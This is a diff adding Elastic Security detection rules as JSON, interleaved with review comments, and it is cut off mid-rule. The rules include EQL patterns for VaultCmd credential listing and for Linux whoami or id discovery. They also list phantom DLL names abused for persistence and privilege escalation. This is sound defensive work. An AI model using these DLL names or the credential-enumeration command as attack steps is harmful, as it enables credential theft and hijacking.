@@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_host", + "name": "Suspicious Windows Process Cluster Spawned by a Host", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "bdfebe11-e169-42e3-b344-c5d2015533d3", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. 
Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: if the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "bdfebe11-e169-42e3-b344-c5d2015533d3_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_3.json b/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_3.json new file mode 100644 index 00000000000..f7dbdaf5c59 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_3.json 
@@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "An anomaly detection job has detected a remote file transfer on an unusual directory indicating a potential lateral movement activity on the host. Many Security solutions monitor well-known directories for suspicious activities, so attackers might use less common directories to bypass monitoring.", + "from": "now-90m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_rare_file_path_remote_transfer", + "name": "Unusual Remote File Directory", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "be4c5aed-90f5-4221-8bd5-7ab3a4334751", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. 
Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "be4c5aed-90f5-4221-8bd5-7ab3a4334751_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_108.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_108.json new file mode 100644 index 00000000000..6cc9d1723f0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_108.json 
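Review bot: The `"setup"` text is internally inconsistent about which events this rule needs: its opening sentence requires "file and Windows RDP process events collected by the Elastic Defend integration", while the Prerequisite Requirements list and the Data View step only mention file events. Given the job id `lmd_rare_file_path_remote_transfer` and the RDP reference in `"references"`, the prerequisites should name both, e.g. `- File events and Windows RDP process/network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.` The exact event categories the LMD datafeed consumes are not visible in this hunk, so confirm the wording against the lmd-ml.json datafeed query before changing it.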
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Searching for Saved Credentials via VaultCmd", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name:\"vaultcmd.exe\" or process.name:\"vaultcmd.exe\") and\n process.args:\"/list*\"\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://web.archive.org/web/20201004080456/https://rastamouse.me/blog/rdp-jump-boxes/", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added 
until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.004", + "name": "Windows Credential Manager", + "reference": "https://attack.mitre.org/techniques/T1555/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_109.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_109.json new file mode 100644 index 00000000000..8979c718966 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_109.json 
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Searching for Saved Credentials via VaultCmd", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name:\"vaultcmd.exe\" or process.name:\"vaultcmd.exe\") and\n process.args:\"/list*\"\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://web.archive.org/web/20201004080456/https://rastamouse.me/blog/rdp-jump-boxes/", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not 
added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.004", + "name": "Windows Credential Manager", + "reference": "https://attack.mitre.org/techniques/T1555/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_3.json b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_3.json new file mode 100644 index 00000000000..2b61e79607c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_3.json 
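Review bot: The `"index"` list includes `logs-system.security*` and `logs-windows.*`, but the query requires `process.args:"/list*"`, and Windows Security 4688 events only carry a command line when the "Include command line in process creation events" audit policy is enabled; without it `process.args` is absent and the rule can never match from those indices. The `"setup"` text covers only the `event.ingested` fallback, so a line such as `For Windows Security (4688) events, enable "Audit Process Creation" together with "Include command line in process creation events"; otherwise process.args is not populated and this rule will not fire.` would save users from a silently dead rule. Separately, if I recall the VaultCmd switch set correctly, `/list*` also matches `/listschema` and `/listproperties`, which do not enumerate stored credentials; consider whether `/list` plus `/listcreds*` is the intended scope.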
@@ -0,0 +1,88 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "building_block_type": "default",
+ "description": "Identifies the use of built-in tools which adversaries may use to enumerate the system owner/user of a compromised system.",
+ "from": "now-119m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*",
+ "auditbeat-*",
+ "logs-auditd_manager.auditd-*"
+ ],
+ "interval": "60m",
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "System Owner/User Discovery Linux",
+ "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and \nprocess.name : (\"whoami\", \"w\", \"who\", \"users\", \"id\")\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "bf8c007c-7dee-4842-8e9a-ee534c09d205",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Rule Type: BBR",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Auditd Manager"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1033",
+ "name": "System Owner/User Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1033/"
+ },
+ {
+ "id": "T1069",
+ "name": "Permission Groups Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1069/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 3
+ },
+ "id": "bf8c007c-7dee-4842-8e9a-ee534c09d205_3",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_3.json b/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_3.json
new file mode 100644
index 00000000000..b8e91cefea0
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_3.json
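Review bot: The `"query"` has no `host.os.type` guard even though the rule is named "System Owner/User Discovery Linux", tagged `OS: Linux`, and reads from `logs-endpoint.events.*`, `endgame-*` and `auditbeat-*`, all of which also carry macOS process events where `whoami`, `who`, `w` and `id` exist; this building block will therefore fire on macOS hosts as well. The sibling VaultCmd rule in this same diff pins its platform with `host.os.type == "windows"`; the equivalent here is `process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "exec_event", "executed", "process_started") and` on the first query line, with a matching `host.os.type` entry added to `"required_fields"`. If cross-OS matches are intended, the name and `OS: Linux` tag should say so instead.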
@@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels.", + "from": "now-6h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_sent_bytes_destination_region_name", + "name": "Potential Data Exfiltration Activity to an Unusual Region", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "risk_score": 21, + "rule_id": "bfba5158-1fd6-4937-a205-77d96213b341", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. 
\n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your network data. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `logs-network_traffic.*` if you used Network Packet Capture.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "bfba5158-1fd6-4937-a205-77d96213b341_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_110.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_110.json new file mode 100644 index 00000000000..965b47c5ef8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_110.json 
@@ -0,0 +1,179 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious DLL Loaded for Persistence or Privilege Escalation", + "note": "## Triage and analysis\n\n### Investigating Suspicious DLL Loaded for Persistence or Privilege Escalation\n\nAttackers can execute malicious code by abusing missing modules that processes try to load, enabling them to escalate privileges or gain persistence. This rule identifies the loading of a non-Microsoft-signed DLL that is missing on a default Windows installation or one that can be loaded from a different location by a native Windows process.\n\n#### Possible investigation steps\n\n- Examine the DLL signature and identify the process that created it.\n - Investigate any abnormal behaviors by the process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the DLL and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources 
like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"driver\", \"library\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (\n /* compatible with Elastic Endpoint Library Events */\n (?dll.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\", \"oci.dll\", \"TPPCOIPW32.dll\", \n \"tpgenlic.dll\", \"thinmon.dll\", \"fxsst.dll\", \"msTracer.dll\")\n and (?dll.code_signature.trusted != true or ?dll.code_signature.exists != true)) or\n\n /* compatible with Sysmon EventID 7 - Image Load */\n (file.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\", \"oci.dll\", \"TPPCOIPW32.dll\", \n \"tpgenlic.dll\", \"thinmon.dll\", \"fxsst.dll\", \"msTracer.dll\") and \n not file.path : (\"?:\\\\Windows\\\\System32\\\\wbemcomn.dll\", \"?:\\\\Windows\\\\SysWOW64\\\\wbemcomn.dll\") and \n not file.hash.sha256 : \n (\"6e837794fc282446906c36d681958f2f6212043fc117c716936920be166a700f\", \n \"b14e4954e8cca060ffeb57f2458b6a3a39c7d2f27e94391cbcea5387652f21a4\", \n 
\"c258d90acd006fa109dc6b748008edbb196d6168bc75ace0de0de54a4db46662\") and \n not file.code_signature.status == \"Valid\")\n )\n", + "references": [ + "https://itm4n.github.io/windows-dll-hijacking-clarified/", + "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", + "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", + "https://shellz.club/2020/10/16/edgegdi-dll-for-persistence-and-lateral-movement.html", + "https://windows-internals.com/faxing-your-way-to-system/", + "http://waleedassar.blogspot.com/2013/01/wow64logdll.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding 